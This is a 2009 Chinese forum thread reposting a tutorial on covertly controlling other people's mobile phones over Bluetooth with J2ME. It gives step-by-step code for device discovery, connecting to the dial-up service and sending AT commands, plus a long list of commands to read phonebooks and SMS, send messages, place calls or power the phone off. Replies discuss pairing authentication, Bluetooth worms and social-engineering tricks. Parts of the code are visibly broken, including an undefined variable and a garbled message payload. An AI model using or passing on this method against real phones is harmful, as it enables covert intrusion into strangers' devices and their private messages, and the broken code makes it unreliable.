首页
社区
课程
招聘
[转帖]j2me蓝牙控制他人手机
发表于: 2009-3-16 22:17 12308

[转帖]j2me蓝牙控制他人手机

2009-3-16 22:17
12308
这个是转载的,很久以前看的就复制下来了,只记下那人的QQ:24259132,忘记帖子地址了
也不知道有没有用,就转到这了
----------------------------------------------------------------------------------------------------
以前如果搞过pc控制手机或玩过modem的朋友大家应该有印象.记得AT命令吗?AT即ATTENTION,90年代初,AT指令仅被用于Modem操作。没有控制移动电话文本消息的先例,只开发了一种叫SMS BlockMode的协议,通过终端设备(TE)或电脑来完全控制SMS。几年后,主要的移动电话生产厂商诺基亚、爱立信、摩托罗拉和HP共同为GSM 研制了一整套AT指令,其中就包括对SMS的控制。AT指令在此基础上演化并被加入GSM 07.05标准以及现在的GSM07.07标准,完全标准化和比较健全的标准。
     对!通过AT命令我们完全控制完全控制手机!我们用什么方式连接到手机呢,以前大家在控制手机的时候多半会用串口,红外.以前我短信群发的时候,用红外,控制了手机让手机进行短信群发。但是你想偷偷控制别人的手机于无形,这两种都不是太好选择,如果你用串口线或USB线你总不至于对你要控制的人说"兄弟,把你的手机拿来,我插根线控制你,看你的短信!",如果用红外说"兄弟,你的手机位置对正一点,不然我控制不到你了!",那么还得是蓝牙,距离是近是近了点,但是始终不容易被发现!
第一步,我们先看看,你的手机支持不支持J2ME的蓝牙!
try{
    Class.forName(”javax.bluetooth.LocalDevice”);
}
catch(Exception ex){
    System.out.println(”操!我的手机不支持蓝牙”);
}
第二步,如果支持蓝牙,我们就搜索一下,看看我们附近有没有蓝牙设备!
LocalDevice localDevice = LocalDevice.getLocalDevice();
discoveryAgent = localDevice.getDiscoveryAgent();//创建蓝牙搜索代理
discoveryAgent.startInquiry(DiscoveryAgent.GIAC, this);//开始搜索,这里的this是指本类.当然我们要在本类实现DiscoveryListener接口.
如果搜索到了有新设备,它会调用deviceDiscoverd()方法接收!
 public void deviceDiscovered(RemoteDevice remoteDevice, DeviceClass cod) {
        try{
            remoteDevices.addElement(remoteDevice);
        } catch(Exception e){
               System.out.println(”猪呀!怎么又错了!”);
        }
}
当设备发现时会调用如下方法:
public void deviceDiscovered(RemoteDevice remotedevice, DeviceClass deviceclass){
 try{
     s = remotedevice.getFriendlyName(false); //得到好友名称,这个有些时候可能为空,也有可能会报错.
 }
 catch(Exception _ex){
   try{
     s = remotedevice.getBluetoothAddress(); //得到蓝牙地址
   }
   catch(Exception _ex2) { }
 }         
}
当搜索完成时会调用如下方法:
 public void inquiryCompleted(int discType) {
    String inqStatus = null;
    if (discType == DiscoveryListener.INQUIRY_COMPLETED) {
      inqStatus = “老子完成搜索了!厉害吧!”;           
    } else if (discType == DiscoveryListener.INQUIRY_TERMINATED) {
      inqStatus = “讨打,叫我搜就搜,叫我停就停,面子都没有!”;
    } else if (discType == DiscoveryListener.INQUIRY_ERROR) {
      inqStatus = “啊哦!老子又挂了!”;
    }
       
  }
remoteDevices不知道是什么了吧~remoteDevices其实就是---一个Vector,用于存放名称及蓝牙地址的.
第三步,搜索蓝牙服务.
RemoteDevice aremotedevice[] = discoveryAgent.retrieveDevices(x);
//这语句读出以前搜索的设备,x为其参数DiscoveryAgent.CACHED(缓存设备)和DiscoveryAgent.PREKNOWN(已知设备),如果要更新设备名称就按上方法,重新刷新一下面好友名称
UUID auuid[] = {new UUID(0×1103), new UUID(0×0100)};
try{
     discoveryAgent.searchServices(null, auuid, aremotedevice[y], this);
//搜索蓝牙设备服务,auuid为指定的服务类型,0×1103代表播号网络服务,aremotedevice[y]指定设备,这里的this是指本类.当然我们要在本类实现DiscoveryListener接口
 }
 catch(Exception exception){
   
 }
当发现新服务时会调用如下方法:
 public void servicesDiscovered(int i, ServiceRecord aservicerecord[]) {
  try{
      if(aservicerecord.length > -1){
        Object obj = null;
        for(int j = 0; j <= aservicerecord.length - 1; j++){
          String s = aservicerecord[j1].getConnectionURL(0, false);// 读出的设备服务连接地址
        }
          System.out.println(”得到服务连接地址!”);
        } else{
          System.out.println(”没有得到服务连接地址!”);         
        }
      }
      catch(Exception exception){
          System.out.println(”又出错了,-_-!”); 
      }
  }
当搜索完成时会调用如下方法:
public final void serviceSearchCompleted(int i, int j){
  if(j != 1){
    System.out.println(”没有搜索到任何可用服务!”);            
  }
}
第四步,连接到设备服务,并实现输入输出.
OutputStream outputStream;
InputStream inputStream;
StreamConnection streamConnection;
streamConnection = (StreamConnection)Connector.open(s);//s为上面getConnectionURL读出的设备服务连接地址
outputStream = streamConnection.openOutputStream();//创建输出流
inputStream = streamConnection.openInputStream();//创建输入流
第五步,如果第四步没有什么问题的话.那么恭喜你,你可以完全控制他的手机了.(哈哈哈哈,奸笑中……^_^),下面我们看一下如何控制他的手机.
现在我们就可以用outputStream直输出at命令了.
如: 发送ATA 接电话命令.
String s=”ATA”;
outputStream.write(s.getBytes());
outputStream.write(13);
outputStream.write(10);
outputStream.flush();
最可以用inputStream.read()来接返回的消息.
再来回顾一次重点.j2ME本身就是支持蓝牙的,手机是通过播号网络服务方式支持at命令的.只要用j2ME连接到另一台手机的播号网络服务就可以直接发送at命令.可惜网上资料太少了.....
下面我们就介绍一下常用的AT命令(具体看手机支持不支持,大多数是标准的^_^):
AT+CGMI 给出模块厂商的标识。
AT+CGMM 获得模块标识。
AT+CGMR 获得改订的软件版本。
AT+CGSN 获得GSM模块的IMEI(国际移动设备标识)序列号。
AT+CSCS 选择TE特征设定。这个命令报告TE用的是哪个状态设定上的ME。ME于是可以转换每一个输入的或显示的字母。这个是用来发送、读取或者撰写短信。
AT+WPCS 设定电话簿状态。这个特殊的命令报告通过TE电话簿所用的状态的ME。ME于是可以转换每一个输入的或者显示的字符串字母。这个用来读或者写电话簿的入口。
AT+CIMI 获得IMSI。这命令用来读取或者识别SIM卡的IMSI(国际移动签署者标识)。在读取IMSI之前应该先输入PIN(如果需要PIN的话)。
AT+CCID 获得SIM卡的标识。这个命令使模块读取SIM卡上的EF-CCID文件。
AT+GCAP 获得能力表。(支持的功能)
A/ 重复上次命令。只有A/命令不能重复。这命令重复前一个执行的命令。
AT+CPOF 关机。这个特殊的命令停止GSM软件堆栈和硬件层。命令AT+CFUN=0的功能与+CPOF相同。
AT+CFUN 设定电话机能。这个命令选择移动站点的机能水平。
AT+CPAS 返回移动设备的活动状态。
AT+CMEE 报告移动设备的错误。这个命令决定允许或不允许用结果码“+CME ERROR:<xxx>”或者“+CMS ERROR:<xxx>”代替简单的“ERROR”。
AT+CKPD 小键盘控制。仿真ME小键盘执行命令。
AT+CCLK 时钟管理。这个命令用来设置或者获得ME真实时钟的当前日期和时间。
AT+CALA 警报管理。这个命令用来设定在ME中的警报日期/时间。(闹铃)
AT+CRMP 铃声旋律播放。这个命令在模块的蜂鸣器上播放一段旋律。有两种旋律可用:到来语音、数据或传真呼叫旋律和到来短信声音。
AT+CRSL 设定或获得到来的电话铃声的声音级别。
ATD 拨号命令。这个命令用来设置通话、数据或传真呼叫。
ATH 挂机命令。
ATA 接电话。
AT+CEER 扩展错误报告。这个命令给出当上一次通话设置失败后中断通话的原因。
AT+VTD 给用户提供应用GSM网络发送DTMF(双音多频)双音频。这个命令用来定义双音频的长度(默认值是300毫秒)。
AT+VTS 给用户提供应用GSM网络发送DTMF双音频。这个命令允许传送双音频。
ATDL 重拨上次电话号码。
AT%Dn 数据终端就绪(DTR)时自动拨号。
ATS0 自动应答。
AT+CICB 来电信差。
AT+CSNS 单一编号方案。
AT+VGR,AT+VGT 增益控制。这个命令应用于调节喇叭的接收增益和麦克风的传输增益。
AT+CMUT 麦克风静音控制。
AT+SPEAKER 喇叭/麦克风选择。这个特殊命令用来选择喇叭和麦克风。
AT+ECHO 回音取消。
AT+SIDET 侧音修正。
AT+VIP 初始化声音参数。
AT+DUI 用附加的用户信息拨号。
AT+HUI 用附加的用户信息挂机。
AT+RUI 接收附加用户信息。
AT+CSQ 信号质量。
AT+COPS 服务商选择。
AT+CREG 网络注册。获得手机的注册状态。
AT+WOPN 读取操作员名字。
AT+CPOL 优先操作员列表。
AT+CPIN2 输入PIN2。
AT+CPINC PIN的剩余的尝试号码。
AT+CLCK 设备锁。
AT+CPWD 改变密码。
AT+CPBS 选择电话簿记忆存储。
AT+CPBR 读取电话簿表目。
AT+CPBF 查找电话簿表目。
AT+CPBW 写电话簿表目。
AT+CPBP 电话簿电话查询。
AT+CPBN 电话簿移动动作。这个特殊命令使电话簿中的条目前移或后移(按字母顺序)
AT+CNUM 签署者号码。
AT+WAIP 防止在下一次重起时初始化所有的电话簿。
AT+WDCP 删除呼叫电话号码。
AT+CSVM 设置语音邮件号码。
AT+CSMS 选择消息服务。支持的服务有GSM-MO、SMS-MT、SMS-CB。
AT+CNMA 新信息确认应答。
AT+CPMS 优先信息存储。这个命令定义用来读写信息的存储区域。
AT+CMGF 优先信息格式。执行格式有TEXT方式和PDU方式。
AT+CSAS 保存设置。保存+CSAS和+CSMP的参数。
AT+CRES 恢复设置。
AT+CSDH 显示文本方式的参数。
AT+CNMI 新信息指示。这个命令选择如何从网络上接收短信息。
AT+CMGR 读短信。信息从+CPMS命令设定的存储器读取。
AT+CMGL 列出存储的信息。
AT+CMGS 发送信息。
AT+CMGW 写短信息并存储。
AT+CMSS 从存储器中发送信息。
AT+CSMP 设置文本模式的参数。
AT+CMGD 删除短信息。删除一个或多个短信息。
AT+CSCA 短信服务中心地址。
AT+CSCB 选择单元广播信息类型。
AT+WCBM 单元广播信息标识。
AT+WMSC 信息状态(是否读过、是否发送等等)修正。
AT+WMGO 信息覆盖写入。
AT+WUSS 不改变SMS状态。在执行+CMGR或+CMGL后仍保持UNREAD。
值得注意的是,通常有些命令是配合使用,比如发送中文短信(在设置完成手机参数后):
outputStream.write(”AT+CMGF=1″.getBytes());//设置信息格式,0为TEXT方式和1为PDU方式。
outputStream.write(”AT+CMGS=’12345678999′,10 “.getBytes()); //发送短信到XX
outputStream.write(”0×600xa80×590x7d0×000x1a”.getBytes());//发送中文短信内容
好了,有了以前的知识,您就可以使用蓝牙控制其他的手机了,事先申明,如果拿去偷看别人的手机被打不关我事.此文仅在技术分析,如果更多需要交流请加我(本文作者)的QQ:24259132,请转载者尊重一下原著的版权,谢谢!

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (18)
雪    币: 89
活跃值: (185)
能力值: ( LV9,RANK:270 )
在线值:
发帖
回帖
粉丝
2
第四步
连接的时候是不是要认证的啊。
2009-3-16 22:24
0
雪    币: 190
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我觉的也是应该有个匹配,这个是很久以前在网上瞎逛的时候看见的就保存了下来

可惜从没实践下...
2009-3-16 22:41
0
雪    币: 146
活跃值: (72)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
4
目前貌似还没有能跳过认证的java 。
2009-3-16 23:18
0
雪    币: 257
活跃值: (105)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
5
以前写过简单的程序试过几个AT指令,
红外线连接,由于电脑没有蓝牙,没试过。
没细看文章,
但总觉得不经确任没法连接到蓝牙手机
2009-3-17 16:24
0
雪    币: 190
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
因为自己不懂,而且这新开了个这样的板块,就转到这让大家看下了
2009-3-17 16:51
0
雪    币: 2604
活跃值: (64)
能力值: (RANK:510 )
在线值:
发帖
回帖
粉丝
7
据我所知:大概在2003-2004年Nokia出产的几款手机蓝牙连接不需要确认,因此产生了几款针对这类手机的蓝牙病毒。这种病毒会使手机处于不断搜索蓝牙用户的状态,一旦找到就尝试感染。这种病毒的一大缺点就是很费电,因为要不断进行搜索。最近几年出产的手机安全性大大提高,未经确认一般不会建立连接。
2009-3-17 17:16
0
雪    币: 190
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
版主果然厉害
2009-3-17 23:20
0
雪    币: 257
活跃值: (105)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
9
看版主这么说,
是不是现在安全性高的实际上也有办法不经确任建立连接?
好像在那个论坛看到过相关讨论贴子,
因为不是感兴趣的,所以贴子也没看。
2009-3-18 08:40
0
雪    币: 2604
活跃值: (64)
能力值: (RANK:510 )
在线值:
发帖
回帖
粉丝
10
利用蓝牙进行恶意代码传播确实是要小心防范的。

对于要求确认的情况:

一种方法是伪装成正常的连接,利用受害人的好奇心来攻击。
国外专门做过调查,在不同场合和时间对于蓝牙连接是否确认会有很大差异。比如在夜总会、酒吧等公共娱乐场所,蓝牙连接请求被通过的概率超过95%。

另一种方法则技术含量更高,利用蓝牙软件开发中的漏洞或者协议实现上的瑕疵做溢出攻击。这种攻击方式危害更大。已经有看到这方面的报道。
2009-3-18 09:09
0
雪    币: 263
活跃值: (10)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
11
操,我的手机不支持蓝牙!
2009-3-21 16:04
0
雪    币: 144
活跃值: (25)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
12
哈哈,我的手机不支持蓝牙,我没买带蓝牙,哈哈.
2009-3-23 19:39
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
OMG  牛人太多了.我要好好学习学习.
2009-3-23 22:53
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
不过,还好.我的手机是心机.充话费送的.别人控制不了.不用提心吊胆的了.
2009-3-23 22:53
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
要能控制就好了。
2009-3-28 15:02
0
雪    币: 349
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
操,我的手机不支持蓝牙!
2009-3-28 23:04
0
雪    币: 33
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
要认证才可以连接上的
2009-4-21 12:47
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
我用蓝牙间谍小试了一下,头四个AT指令很好
2009-6-9 19:09
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
AT指令有公有和私有两种协议,小弟做过的gsm模块就是自己写的AT协议,他可以通过串口跟主控芯片通讯,至于蓝牙是否具有控制芯片的权限和功能,还真的不清楚,就算可以,恐怕只能控制多媒体部分,通讯部分的串口一部机子和一部机子是不同的,而且恐怕不容易搞到人家是用那个串口控制GSM模块;     
     其二,很多单模非智能的机子,不需要GSM模块而是直接板载,它的的主控就是模块芯片,比如ulc2的7880。。。这样根本就不用AT指令,就更不好办了。。。。xxxx
楼主的想法很有意思,但是事实起来恐怕难度太大,还是想想别的办法更好一些。。
2009-6-10 22:29
0
游客
登录 | 注册 方可回帖
返回
//